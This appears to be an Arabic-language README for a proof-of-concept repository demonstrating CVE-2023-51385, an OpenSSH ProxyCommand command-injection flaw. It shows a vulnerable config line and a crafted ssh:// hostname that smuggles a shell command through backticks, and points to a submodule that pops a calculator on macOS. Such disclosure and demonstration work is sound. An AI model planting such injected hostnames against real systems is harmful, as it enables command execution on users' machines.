
CVE-2023-51385
RCE عبر ~/.ssh/config غير آمن
استخدام الرموز مثل %h و %p شائع جدًا لاستخدام الأنفاق والوكيل للاتصال عبر SSH.ProxyCommand
الإعداد الضعيف
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
ملاحظة: في تقييمي الأولي، كنت أعتقد أن استخدام '%h` (علامات اقتباس مفردة) سيتجنب ذلك، لكن يبدو أن هذا لا يزال عرضة للخطر بشيء مثل:
ssh://echo helloworld > cve.txt`foo.example.com/bar
مأخوذ من: https://man.openbsd.org/ssh_config#ProxyCommand
ما هو موجود في هذا المستودع
وحدة فرعية تستغل هذه الثغرة لعرض آلة حاسبة على OSX.
جربها باستخدام:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
أو
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules